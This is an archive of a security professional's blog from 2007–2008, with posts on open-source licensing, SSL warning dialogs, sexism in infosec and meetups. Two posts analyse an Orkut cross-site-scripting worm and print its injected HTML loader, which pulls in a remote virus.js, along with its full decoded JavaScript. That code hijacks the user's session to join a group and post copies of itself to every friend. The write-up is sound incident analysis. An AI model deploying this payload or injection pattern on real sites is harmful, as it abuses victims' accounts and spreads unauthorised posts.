Could I give you the extra $50 for multiple snapshots, PLEASE?! I only need this on my laptop when I'm traveling. I will use just as much ESX when I'm at work, I promise.

My D&D

2008-03-04T21:32:00.000-08:00

Let me show you it.

Set here

More on Orkut worm

2007-12-19T00:22:00.000-08:00

Yes, my HTML/Javascript-fu is weak. So much so that I didn't know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that's why it has "Flash" written all over it.

To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone whom I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!

One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what's going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.

So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. Take a look at the chunk of HTML that ends up as a scrapbook entry that I posted earlier.

It obviously pulls in a chunk of Javascript that is even named "virus.js". But why all the trickery with the Shockwave and flash stuff? If Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?

So I did some experiments tonight. I tried the old script, alert 'hello I'm an XSS', etc... and that doesn't work. It says my rich content was rejected, see here.

And yet, I can paste in a much more complicated embed a flash movie expression, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight, otherwise I'm not seeing how the worm worked so well.

So the basic security challenge for Orkut here is that they want to allow some arbitrary HTML, but not others. As we have seen for many years with web-based email, that's a pretty hard problem to solve.

So that's why the hoops to jump through. The worm author needed something that looked like a flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.

This is where the SWFObject library comes into play. Its purpose in life seems to be to make it easier to embed Flash stuff and have it play properly. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages. They keep it at http://img2.orkut.com/js/gen/scraps006.js, which they source for you.

It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn't alone in having all the good Web 2.0 worms anymore.

Jeremy decoded and prettied up the obfuscated Javascript. You can see that code at the end. If you're watching carefully, you'll see this version has a different message as the scrap body than the one I originally posted. That means the person (presumably the worm author) who controls the virus.js download page has revved the file at least one. I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I'm guessing the author changes the text in case Orkut was keying off that.

Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you'll be answering CAPTCHAs or something similar left and right.

Also worth noting is that stopping the worm doesn't stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment, I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.

It looks like the immediate problem is over. I probably won't have a lot more technical to say on this one. I hope that the Jeremiahs and RSnakes of the world will jump in soon and tell me how the worm actually works.

Decoded Javascript:

var index=0;
var POST=JSHDF["CGI.POST_TOKEN"];
var SIG=JSHDF["Page.signature.raw"];

function createXMLHttpRequest(){
try {
return new
ActiveXObject("Msxml2.XMLHTTP")
}
catch(e){
} ;

try {
return new ActiveXObject("Microsoft.XMLHTTP")
}
catch(e){
};

try {
return new XMLHttpRequest()
}
catch(e){
} ;
return null
};

function setCookie(name,value,expires,path,domain,secure){
var curCookie=name+"="+escape(value)+(expires?";expires="+expires.toGMTString():"")+(path?";path="+path:"")+(domain?";domain="+domain:"")+(secure?";secure":"");
document.cookie=curCookie
};

function getCookie(name){
var dc=document.cookie;
var prefix=name+"=";
var begin=dc.indexOf(";"+prefix);
if(begin==-1){
begin=dc.indexOf(prefix);
if(begin!=0){
return false
}
} else {
begin+=2
};
var end=document.cookie.indexOf(";",begin);

if(end==-1){
end=dc.length
};
return unescape(dc.substring(begin+prefix.length,end))
};

function deleteCookie(name,path,domain){
if(getCookie(name)){ document.cookie=name+"="+(path?";path="+path:"")+(domain?";domain="+domain:"")+";expires=Thu, 01-Jan-70 00:00:01 GMT";
history.go(0)
}
};

function loadFriends(){
var xml=createXMLHttpRequest();
if(xml){
xml.open("GET","http://www.orkut.com/Compose.aspx",true);
xml.send(null);
xml.onreadystatechange=function(){
if(xml.readyState==4){
if(xml.status==200){
var xmlr=xml.responseText;
var div=document.createElement("div");
div.innerHTML=xmlr;
var select=div.getElementsByTagName("select").item(0);
if(select){
select.removeChild(select.getElementsByTagName("option").item(0));
select.setAttribute("id","selectedList");
select.style.display="none";
document.body.appendChild(select);
sendScrap()
}
} else {
loadFriends()
}
}
};
xml.send(null)
}
};

function cmm_join(){
var send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.join";
var xml=createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityJoin.aspx?cmm='+String.fromCharCode(52,52,48,48,49,56,49,56),true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);
xml.onreadystatechange=function(){
if(xml.readyState==4){
if(xml.status!=200){
cmm_join();
return
};
loadFriends()
}
}
};

function sendScrap(){
if(index==document.getElementById("selectedList").length){
return
};
var scrapText="Boas festas de final de ano![silver]"+new Date().getTime()+"[/silver] ";
var send="Action.submit=1&POST_TOKEN="+encodeURIComponent(POST)+"&scrapText="+encodeURIComponent(scrapText)+"&signature="+encodeURIComponent(SIG)+"&toUserId="+document.getElementById("selectedList").item(index).value;

var xml=createXMLHttpRequest();
xml.open("POST","http://www.orkut.com/Scrapbook.aspx",true);
xml.setRequestHeader("Content-Type","application/x-www-form-urlencoded;");
xml.send(send);
xml.onreadystatechange=function(){
if(xml.readyState==4){
index++;
var wDate=new Date;
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut',index,wDate);
sendScrap()
}
}
};

if(!getCookie('wormdoorkut')){
var wDate=new Date;
wDate.setTime(wDate.getTime()+86400);
setCookie('wormdoorkut','0',wDate)
};

index=getCookie('wormdoorkut');
cmm_join();

Orkut "virus"

2007-12-18T21:02:00.000-08:00

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don't really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:

2008 vem ai... que ele comece mto bem para vc

I still don't know exactly what it means, I'm assuming it's Portuguese. Babelfish wasn't any help. I won't mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!

I haven't done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:

<div id="flashDiv295378627"><embed type="application/x-shockwave-flash" src="Scrapbook_files/LoL.html" style="" id="295378627" name="295378627" bgcolor="#FFFFFF" quality="autohigh" wmode="transparent" allownetworking="internal" allowscriptaccess="never" height="1" width="1"></embed></div><script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '295378627', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '295378627'); flashWriter._addParam('wmode', 'transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv295378627');</script>

Looks like it joins you to an Orkut group, too:

Infectados pelo Vírus do Orkut.

Owner of the group is a new-looking account named "Virus do Orkut". Also, listed at the end of the virus.js file is this: author="Rodrigo Lacerda"

Comment spammers

2007-10-30T08:23:00.000-07:00

The comment spammers have finally found me. I have tried deleting the comments manually, but they just post a couple more every day. I've turned on CAPTCHAs, we'll see how that works. I'm loath to put any barriers in for people wanting to comment, so sorry about that.

Off to vegas 2007

2007-07-31T10:08:00.000-07:00

I'm on my way to Las Vegas for Black Hat & Defcon. For Black Hat, it looks like I'm doing a booksigning on Wednesday at 4:30. BigFix is hosting the Gala at 6:00 on Wednesday as well, so I will be putting in an appearance. Please come say hi if you're around. I will also be at Defcon, but good luck spotting me in the crowd there if you don't already know what I look like.

I look forward to catching up with friends I only get to see at cons.

The Ladies of Infosec

2007-07-19T10:36:00.000-07:00

I was at an event not long ago, and the woman in the group was really pissed. In a room full of nothing but security geeks, someone asked her "Oh, do you do security work?"

This didn't happen with any of the guys. The question they got was "Where do you work?"

I was thinking about this today, and I realized that every woman I know who works in infosec has told me a similar story. That might be a slight exaggeration, but not much. Literally every one I can think of right now has told me one of these stories.

They get things like:

Are you here with your boyfriend?
She used to be a man
Take your shirt off

Yes, sadly I have heard jerks yell out "take your shirt off" when a woman was trying to give a talk.

How much do women hate this? You can read what Raven thinks about it.

Let me tell you a little about this particular woman in question that reminded me of all this. She has worked in some of the most important software companies in the world, in the security groups. She has worked at at least two security companies that I know of. Pick just about any well-know security male, and they know who she is and they respect her work.

If you've been paying attention to the infosec world, you probably know who I'm talking about. Keep it to yourself, because this particular woman is not the point.

I have met a number of women at various conferences. I'd look really foolish if I went around assuming they weren't attendees or didn't know what they were doing. I've met a woman who works for the CIA. I've met one who was a heavy-duty cryptographer. I've met one who does BGP vulnerability research. Yes, the women are rare. Staring and asking stupid questions doesn't help improve that.

Because of how hostile the infosec world is to women, the ones who manage to survive tend to really love what they do, and have worked very hard to stay in the field. This may mean that the woman you just met is better at security than 90% of the men. That probably includes you (and I'll happily concede that includes me.)

Keep that in mind.

BaySec 3 Tonight!

2007-07-18T13:36:00.000-07:00

BaySec 3 is tonight, July 18 2007.

Per Nate:
July 18th, 7-11 pm or so.
O'Neills Irish Pub
747 3rd St (at King)
http://www.tisoneills.com

The BigFix logo

2007-07-17T16:46:00.000-07:00

I promised to keep my work blogging on the the work blog, unless I thought I had been particularly clever. I think this one qualifies.

BaySec 2

2007-06-20T08:24:00.000-07:00

BaySec 2 is tonight, June 20 2007.

Details here.

Hope to see you there!

Attention Jed Pickel

2007-06-06T00:47:00.000-07:00

It appears that I owe you a big apology. You were right, I was wrong.

(It's amazing the stuff you find when googling yourself.)

Open Source Remorse

2007-06-04T21:23:00.000-07:00

So rather than continuing to carry on in the Matasano blog comments (1, 2) and being mirrored in Alan's blog, I figure I should gather my thoughts on this subject in my own long-winded blog entry.

Now, my recent comments have been prompted by Alan's and Tom's comments at each-other, but they aren't about that per se. I gather the background there is that StillSecure has released Cobia ~~which includes Snort (and other open-source bits?),~~ but the Cobia bits aren't GPL. I really don't know anything about whether there's any inappropriate linking or anything going on, I haven't looked at it. The StillSecure guys raise some legal doubts about the GPL, and Tom points to Marty's post about the "clarifications" in the Snort license.

(Update: Alan tells me that Cobia does NOT include Snort. Leaving me wondering what Tom was was upset about in the first place. Shrug. Sorry about further muddying things with my incorrect claim, Alan.)

The key point that Tom raises that I want to take issue with is this:

Why do I care? Because companies like StillSecure are driving open-source projects “underground”, into proprietary licenses. Wow, that sucks.

Now, let's hang on a second there. It looks more to me like a basic desire to make money has caused the open-source security tools developers to start changing their licenses.

They have open source remorse.

It looks more to me like they are finding it difficult to get people to pay them when their stuff is licensed only under a GPL license. Obviously, if the software is only available under the GPL, then anything else it goes into also needs to be GPL. (Modulo calling vs. linking vs. straight source modification, etc... I'm not here to try to hash that mess out.)

I've watched this happen with BitTorrent, Nessus, nmap, and Snort.

Is there anything wrong with making money with software? Certainly not. I've worked at Sybase, contracted at ArcSight, tried my own hand with Enforcer for AnchorIS, and am currently about 4 years in at BigFix. BigFix, by the way, has licensed nmap for commercial use, and Fyodor's licensing terms were very reasonable. All those companies I worked at are traditional, closed-source software vendors. So I fully stand behind profiting from software licensing.

We are salesmen, and completely up-front about that.

But I believe there is a different standard if you're going to go the open-source route. Maybe I'm too much of an idealist, but then, the GPL is kind of an idealist license.

So here's the game: You create some very early, proof-of-concept open-source security tool. Maybe you're early to the market, or maybe you have some genuinely nifty feature, but you're a known concept, an IDS or a scanner.

How do you gain popularity? Well frankly, being free can be a huge help. And if you're not doing it for a living anyway, it works for everyone. What do most open-source projects want? Help. For the packages I've mentioned, they got it

Maybe it wasn't in the form of (much) code. But it was in the form of signatures, QA, people running mailing lists, people submitting fingerprints and banners for obscure software, filing bug reports and feature requests, help compiling on weird unixes, packet captures, books, articles, and other general evangelism. The license also allows every Linux distro in the world to ship your stuff, further cementing you as a de-facto standard.

Those things are absolutely massive contributions for a young project. I don't wish to discount the efforts of the key developers on each of those projects. The packages would most certainly have fallen into obscurity without their leadership. But even then, you don't maintain such a project for years without a positive feedback loop.

But for the projects mentioned, the maintainers eventually decided they would like to make a living off the project.

This is where I admit that I don't know what's in the hearts and minds of the people who are now selling commercial licenses for these projects. I can only judge based on their actions and published licenses.

But it sure looks like they're taking the combination of their own work and the community support, and selling it for a profit.

Why do I care? Because I believe that a lot of people, myself included, gave support because they thought they were helping out a project that was only under a GPL license. Changing it after the fact strikes me as a kind of dishonesty. If you help out a commercial software company, great. You knew what you were helping. I know a lot of people who do free QA for Microsoft.

But if you think you're contributing to a project because your help will always be available to the world, and you'll find it in your favorite latest Linux distro, sorry. Nessus is all the way there, no new Nessus for anyone who doesn't want to register, download and install it themselves, and so on. And no source. Snort and nmap can still be shipped around, but we'll see if it stays that way. No more free Snort sig feeds for you though, if I recall correctly.

I should clarify a point. I keep talking like these projects aren't GPL anymore. That's because I don't think they are, at least not entirely. Nessus clearly isn't anymore. No question there. How about Snort and nmap which have commercial versions available for licensing?

Marty asks in the Matasano blog comments next to me "Snort isn't GPL?"

No.

So you can take Snort and code on it or mix it with other code, and your users can demand the source from you under the GPL terms. That seems pretty GPL, right? So what if your code is in Snort, and SourceFire sells a license to a commercial software vendor. Can you make that vendor give you a copy of their source?

Nope.

Anyone remember the point of the GPL? It's so that no one can take your code away from you.

So you might be wondering, how can they take your GPL code and sell it under another license? Am I accusing these projects of stealing code? No, not really. I assume that they have acquired the rights to all the bits of code or have purged the stuff they can't track down.

Yes, this does mean they had to have planned this for a while. They had to stop taking contributions from all the outsiders or people who will only submit GPL code. I believe these guys are smart enough to get this right, though I wouldn't mind seeing how they went about auditing the codebase.

Does this mean they can never take outside code again? Well, it means the submitter has to be willing to give them a license to do whatever they want with it, including selling it non-GPL'd. This would include, say, people working on it for the Google Summer of Code.

SourceFire has that part tied up rather neatly, too. If you read Marty's "clarifications", you'll see that if you get your code near any SourceFire people, then you automagically grant them the right to sell it as closed-source.

So no, not GPL.

Another interesting thing about the GPL, it only covers code and maybe some docs. If you made some other kind of contribution like the ones I mentioned earlier, not covered. They can just take it and sell it.

So who is really killing GPL'd projects? If you think StillSecure is stealing without giving back, I'm not seeing how SourceFire isn't doing some of the same.

I've met Fyodor and a bunch of the SourceFire guys a number of times. I don't have anything against them personally, and it's not like I don't wish them financial success. I just wish they had either had the license they really wanted in the first place, or didn't go changing it late in the game.

That's your manifesto?

2007-06-02T14:32:00.000-07:00

Pete Lindstrom posts his Secure Software Manifesto. Pete, you'll have to do better than that. I guess a manifesto is not a thesis, it's not intended to be a self-contained set of assertions and evidence. But I feel it necessary to call out what look like some glaring factual errors and inconsistencies to me.

1. Public vulnerability information (e.g. CVE, disclosure info, etc.) provides data about the activities of the hacker/bugfinder/security researcher community; it tells us nothing about the absolute or relative level of vulnerability of software.

On the contrary, I think the effort required to find bugs, and the rate and volume at which they are discovered are the best indicators of the relative level of security of a software package. I will agree that this doesn't tell us the absolute number of vulnerabilities left. There's always the chance that the researchers found the absolutely last bug in a package on the 31st while doing their Month of x Bugs.

The past is not necessarily a predictor of the future, but the past may be a predictor of the more recent past. Or you might prefer correlator. I believe the data is all there for someone who wants to, say, take the bugs for packages from 2005 and see how they correlated with bugs in 2006. At least for known bugs.

2. The defining aspect of a software program's vulnerable state is the number of vulnerabilities (known or unknown) that exist in the software. It is not how hard programmers try not to program vulnerabilities nor how hard others try to find the vulnerabilities.

The first sentence is a fine definition. The second sentence seems to be trying to distance itself from the first, though. If you try hard to create fewer vulnerabilities (and have some talent and experience in that), don't you think you will create fewer vulnerabilities? And if you missed some, and other find them and you fix them, don't you mostly end up with fewer vulnerabilities?

So no, using the definition of "vulnerable" to mean there is at least one vulnerability left, there's probably no amount of effort you can expend that is going to get that count to zero. But don't we want software packages that have fewer vulnerabilities, if you can't have zero?

Because if there's no value to that, I know lots of people who could be doing something else with their time.

3. The contribution of a patch to the vulnerable state of a software program is a tradeoff between the specific vulnerability (or set of vulnerabilities) it fixes and the potential new vulnerabilities it introduces.

Sure. Do you mean to imply that patches often introduce new problems? I'm kinda under the impression that's relatively uncommon, but I'd be willing to be proven wrong.

4. There is currently no known measurement that determines or predicts the vulnerable state of a software program.

False. If you use the definition of "vulnerable" meaning that there is at least one vulnerability, then I have a program that will read any other program of some minimum complexity, and return the probability that it is vulnerable. The answer is usually 1. I'm very confident in my low false-positive rate.

Facetiousness aside, I agree that there is no metric or program to find or event count all of the vulnerabilities in a program. Maybe not even most of them.

But there are programs, services and consulting that will find "some". Is there value in finding "some"? Is it useful to know how hard it was to find "some"?

5. We don't know how many "undercover" vulnerabilities are possessed and/or in use by the bad guys, therefore we must develop solutions that don't rely on known vulnerabilities for protection.

Once again, I agree with your opening statement, and am left wonder where you got that particular conclusion. Why not "therefore we must find and fix as many vulnerabilities as possible" or "therefore we must infiltrate the underground and gather intelligence"?

6. The single best thing any developer can do today to assist in protecting a software program is to systematically, comprehensively describe how the software is intended to operate in machine (and preferably human) readable language.

As a QA guy, I'd have to say that would be really, really awesome. Yes, can I have that please? But if I had that, isn't that the same as programmers trying hard, ala your point 2?

BaySec 1 Tonight!

2007-05-16T10:51:00.000-07:00

BaySec is this evening. Hope to see you there!

Also, there is now a CitySec site for organizing these things. I know it's unlikely that you're aware of or care about the city meetups are are not reading the Matasano blog and don't know this already. But for completness' sake, and search engines and so on.

BaySec!

2007-05-05T14:02:00.000-07:00

The first San Francisco-area Matasano-inspired BaySec get together is Wednesday May 16 2007, 7:00 PM at Zeitgeist. They tell me they don't do reservations, and the best thing is to show up early and stake out your seats. Sounds like an invitation to take over the place to me.

Likely attendees (aka those of us who have been conspiring to get BaySec started) are Raffael Marty, Anton Chuvakin, Nate Lawson, and more importantly, you.

There's a mailing list, courtesy of Tom Ptacek:
baysec at sockpuppet dot org
baysec-subscribe at sockpuppet dot org

Hope to see you there, and please spread the word.

Why SSL sucks

2007-04-03T21:56:00.000-07:00

Recent posts about security protocols like SSL and DNSSEC got me thinking. In an orthogonal direction.

You know what's wrong with protocols like SSL, SSH and PGP/GPG? They let users pick the stupid. Bruce Schneier has trained me to call this the "dancing pigs" problem, though I'm too lazy to go look up the guy Bruce says he got it from.

It goes like this: "There's a problem with the security gizmo; click OK to see the dancing pigs."

Unless you're a security researcher who lives for the chance to investigate a malicious server, you just click OK to see the dancing pigs.

All my kids have been computer users since before they could read. They don't know what the dialog says, but they learn to click OK to see the dancing pigs. Even when they do learn how to read, they aren't necessarily so concerned with expired certificates or DNS name mismatches.

The reason these protocols all suck is because they let just anybody make the security policy decisions. Stupid.

(OK, so it's not the protocols/file formats themselves, just every app that implements them.)

So, what am I suggesting instead?

Dan Kaminsky wrote an excellent chapter on spoofing for me, for the first edition of Hack Proofing your Network. I hope to have it available for download one of these days. In it, he makes a perfect case for reliability == security. If your service is going down all the time, then you are being trained to live with unreliability and ignore strange problems. Your judgment is shot.

So much for the idea that a DoS isn't a security problem.

As a QA guy, I really want bugs to crash, and crash hard. Crash dump or core file too, please. The alternative is random behavior, unreproducible issues, caught exceptions that I really needed to know about, and maybe memory scribbling that could exhibit random symptoms. You don't want it to be kinda tolerable, not that big of a deal, I haven't seen it in a while I guess it's gone kind of a problem.

So security protocols need to break and break hard.

If there's a problem with the certificate, then just drop the connection. Don't prompt the user. Don't try to rate how bad of a problem it is. Don't toss a yield sign in the corner, don't show me a key with fewer teeth. Just stop.

If the SSH server keys have changed, don't connect. Don't offer to connect anyway. Don't ask if I want to save over my keys. Don't tell me the command-line switch to disable my security.

If the GPG email signature doesn't verify, don't let me read it anyway. Don't invite me to keep searching keyservers until I happen to find one with keys that agree.

Why? Because if it breaks properly, people will be forced to get someone competent to fix it. And they will HAVE to fix it.

Examples. If someone's SSL cert expires, right now they can sort of ignore it for a little while, or tell people to click OK, and so on. Do it my way, and it breaks entirely, and the person who should have renewed the cert does so, right now. Don't get me started on self-signed certs. If you've done something and blown away your server SSH keys, you think no big deal, just tell everyone to accept the new ones. Do this enough, and what have you trained users to do? If instead SSH doesn't work at all, how much more careful would you be about bothering to restore the original SSH keys?

But this is painful for people? That's the point. People learn through pain. Some things should be punished. Some events should be disruptive.

People should be trained to take security seriously.

I'm glad you got your kid back

2007-03-27T00:34:00.000-07:00

Erik takes his kids to Disneyland, but manages to lose the 3-year-old. But that's OK, he had hung a USB flash drive around the kid's neck, and had him back within 13 minutes.

Our three year old did just what we thought he would do - Disappeared. Within 13 minutes of being ‘lost’ though, my cellphone rang.

The little scamp.

Anyway, I actually am glad he got his kid back so quickly. Nothing is worse than having your young child go missing. But...

So the father planned ahead, that's good. If you'd like to do the same yourself, I see that SurplusComputers has a 2-pack of similar-sounding drives for about $8.

But I can't say I recommend you do that. Instead, I recommend that you plant the equivalent of a dog tag on your kid. It's no worse than the USB version, and you're much more likely to get someone with a cell phone and no computer handy to just read the tag and call you.

Heck, if you know you're probably going to lose your kid at Disneyland, I bet you could get them back in just 5 minutes with the dog tag.

Oh, and I see the lost USB drive thing just relies on Autorun to pop up the message. Disneyland Security, you just got pwned by a 3-year-old. Pentesters, are you paying attention?

Found via The Disney Blog.

Owning up

2007-03-24T00:35:00.000-07:00

If you're a software vendor and a researcher comes along a claims there's a problem with one of your offerings, and you (the vendor) think there is not, you issue a public statement to the contrary. That's fair.

However, if the researcher persists and manages to prove his or her case to you, what do you do?

If you're Microsoft, you own up to the problem, and thank the researcher for making you understand.

Exhibit 1
Exhibit 2

That sure looks like the right way to do things to me. At least, the drama will probably only last about a week.

FPO

2007-03-12T22:23:00.000-07:00

Great short blog entry By Larry Osterman about FPO. I certainly have seen any number of functions that work both ways, but I never knew it had a name, and I hadn't picked up the implication for debugger stack traces.

Official shilling

2007-03-08T10:32:00.000-08:00

My employer BigFix has launched a company blog. I have written my first entry responding to a post on Ross Brown's blog.

Anything that's strictly a BigFix topic, I'll probably do over there from now on. Though, if I think I've been especially clever or something I may drop a pointer here as well. I can think of at least one thing coming up in the future that will be posted over there that I will probably want to share. It's a follow-up of sorts to my previous Rubik-related post.

Julie Amero add'l

2007-02-22T15:59:00.000-08:00

Brian Livingston gave me permission to write my Windows Secrets article this time about Julie Amero. I'm grateful that he allowed to use my space there (which is a paid gig for me) to help spread the word. Brian is sympathetic to her situation as well, and you may have seen him quoted in the New York Times story about it. In addition, he made it the Top Story, which means that it goes to ALL subscribers, not just paid subscribers. It also means I can link to it from anywhere, like I just did.

If you don't know about Julie's situation, you can read my article, and there are some links in it to others that give more background. If you read security blogs at all, you probably already know all this, so I won't cover it here. The reason I haven't mentioned it before is because I was preparing that article, and because I have been working behind the scenes with others, as hinted at in the article.

I can be long-winded, so my article was over twice the length it was supposed to be, and had to be cut down a bit for the newsletter. I wanted to use the extra material here, and make an update or two.

In the ComputerCOP Pro section, I originally had this:

So what did the detective use to examine the "image"? He used a program called Computer COP Pro. Here's an example entry from the FAQ:

Q. Does Professional require training to use?

A. For a competent computer user, Professional truly does not need training to use as the detailed search applications are performed automatically by the software and the product does come with a Getting Started manual. However, because you may need to testify in court or in a hearing, it would be best to receive the company's training and certification.

So, training would be nice, but you can get away with not doing it if it's inconvenient. I'm told that training consists of an hour on the phone.

Needless to say, this program really doesn't sound like it would meet my standards for a forensics utility.

[and]

Since this is a key portion of the prosecution's case, Alex Shipp contacted a representative from the makers of ComputerCOP about this aspect of their software. Alex tells me:

Allison Whitney, directory of communications for ComputerCOP, confirmed that the product was unable to distinguish between URLs visited as a result of malicious software, and URLs visited by direct user action.

She also confirmed that this point is not made clear during the ComputerCOP training. At this point in time, ComputerCOP have no plans to contact the Connecticut court to point out the errors in interpretation of the ComputerCOP output made by the prosecution attorney and prosecution expert witness.

[and]

Why didn't the defense present these kinds of findings? They tried. There appears to have been a procedural error on the defense's part, and the judge would not allow the defense to enter their evidence. The defense expert has publicly stated that his analysis of the computer files would have revealed that spyware was causing the pop-ups to appear and he feels the evidence would have totally exonerated Julie.

[end of extra material]

Speaking of procedural errors on the defense attorney's part, it appears that Julie is getting a new lawyer, and this may delay sentencing. This is good news. The article makes the new lawyer out to be a hot shot, which is exactly what Julie needs. Despite the fact that she has been declared guilty already, there are a couple of small chances for the case to be resolved before sentencing still, from what I understand. The prosecution could realize that there has been an error in the facts presented, and request that the verdict be vacated, for example. I'm obviously not a lawyer, so apologies if I have abused the terminology.

Despite the TV shows you see, I'm learning that appeals aren't as easy to get as you would think, so anything that helps slow this train wreck down and bring some sanity into the situation is a welcome development.

Apple vs. Maynor update

2007-02-10T09:53:00.000-08:00

I had a great time chatting with people at the security bloggers meetup the other night. There were any number of "I didn't know you blogged" moments all around. Two of the guys I spent some time talking with were David Maynor and Robert Graham who have recently formed Errata Security. And yes! they are blogging too.

We chatted about all kinds of things. We chatted about Robert moving on after IBM acquired ISS. It seems that David found some reason to move on from his position at Secureworks, too. And then we went to dinner at some mediterranian tapas food place, and chatted some more. They bought. Thanks for the dinner, guys!

So when I got back home, I tracked down their blog, and there's some good stuff there. Hey look, there's this one particular entry from David. Looks like he's tired of keeping his mouth shut about the Mac wireless hack thing. Short version of my take on the issue: I believe David and Johnny.

But at this point, I do have to agree that some opportunities have been lost. The Matasano guys propose some hoops that researchers should be going through. Frankly, I thought that was a little silly and totally unnecessary. Even in David's case. I never thought for a second that Apple would ship the patch while still claiming that David and Johnny found nothing. I was wrong on both counts.

So unfortunately, this leaves room for the next bit of stupidity. If/when David ever decides to demo owning the built-in wireless, or release an exploit, etc... then the Mac zealots will claim that he must have reverse-engineered the Apple patch, and that he never found anything ahead of time.

Because David can reverse engineer the patch and write a working exploit, but he's not capable of finding the hole in the first place, right? And the hole that Apple fixed just coincidentally is in the area that the original Black Hat talk covered. And the holes in other OSes that they found of the same class aren't related. ~~And HD Moore using their fuzzer and finding a similar hole in OS X has nothing to do with it.~~

One of these days, I hope David drops more info. At this point though, it looks like Apple has been largely successful. They have managed to drag things out long enough and tell enough half-truths that their customers believe Apple. So it's likely that few zealots will be swayed when David finally presents proof. There will just be further dismissals from people who really don't understand security very well. I still look forward to it, though.

Hey look, David is speaking a couple of times at Black Hat Federal later this month.

I'm in ur package, playing with ur puzzlez

2007-02-10T01:20:00.000-08:00

So one of the developers I work with, Dave, is quite the twisty-puzzle fanatic. Take a look at some of his photos on flickr, and you'll see what I mean. Here's something like 1/3 to 1/2 of what he has in his office at work:

As you might imagine, Dave is also on all the various puzzle sites, and knows which puzzles are rare, which are worth the most, and which ones he doesn't have. Recently, he worked out a trade with some other puzzle collector in another country. He shipped a Square-1 in exchange for a few other puzzles. This is what arrived in the mail:

Yes, go ahead and look at the larger version of that pic. That's the Department of Homeland Security logo. So what was inside that caused such alarm that they had to open his package in transit to inspect it?

We suspect it was the rare and unusual Rubik's Hat that caught their attention. Had it been your run-of-the-mill 3x3, I doubt they would have felt it necessary to play with it. or maybe they saw The Da Vinci Code recently, and it looked like a cryptex on the x-ray?

Rubik-sniffing dogs?

Dave did note that whoever was fondling his hat didn't seem to have any luck solving it. Good thing he didn't trade for something with batteries and wires.

Update: As if to further prove his cube-geekiness (did I mention that he placed fairly well at the recent cube-solving time trials?) Dave writes:

Nice, although technically it was my custom modified Square-1 that I traded, as a vanilla Square-1 is only worth $20-$30. I hear that the maker may even be doing another round of production, in which case the price might go back down to $9.99 or so. Here's a flickr picture of my custom modification:

http://farm1.static.flickr.com/135/362992417_66e4734f8a.jpg

I stand corrected.

Kidnapped

2007-02-08T01:11:00.000-08:00

Alright, I admit this has nothing to do with my usual blogging topics. Maybe because I snapped it while leaving the hall at RSA to head to the security bloggers party?

Hey, at least that's not quite as bad as ninjas killing your family.

I paid the gentleman a dollar for the privilege of taking his photo. I found him on 4th street between Howard and Mission, around 6pm. I have no idea what his usual working hours are, or how often he rotates his signs.

Second best ad at RSA

2007-02-08T00:44:00.000-08:00

I hereby declare the second-best ad at RSA:

"Beware of False Positives"

Awesome!

(I give "best" to my company's own ad, of course. It holds special place in my heart. However, if you think this one is first place, and ours only second, I'll forgive you.)

The woman working the booth tells me that it was "obtained" in Seattle, and is authentic. They were raffling it off in their booth. Excellent job CyberDefender.

I'm shillin' like a villain

2007-02-07T23:46:00.000-08:00

I just had a great time at the security bloggers thing. I was a little surprised that not only a number of them read my blog, but given that, they don't realize I work for BigFix. Speaking of vendor bias, I will now attempt to provide a good clear example.

We have been trying some new ad campaigns lately. First, there are the Software Truth viral videos. I think they're worth a chuckle. We've gotten some good feedback, and people seem to like them. So far, the only complaint has been from one blogger who seems to have been fooled into thinking they were some sort of real senate hearing. But I think that reflects more on that particular blogger than it does on our videos.

And then the last couple weeks at work, I see this ad taped to the door of our CEO's office. I assumed it was an internal joke thing, and that we would not go there.

Apparently, we would. We are on the playground talking smack, and our competitors should consider it to have officially been brought.

Check out this ad (~1MB .pdf). I'm told that this ran nice and large in the Northern California edition of the Wall Street Journal today. And you should expect to see it in a number of magazines Real Soon Now. Should you enjoy it as much as I do, you can go to our site and sign up for a demo of our stuff, and get a poster version of it. (If you don't want to grab the PDF, that link also shows the picture and text, so you'll get the idea.)

Yes, those are McAfee, Symantec, altiris, and Landesk we are ramming our sword through.

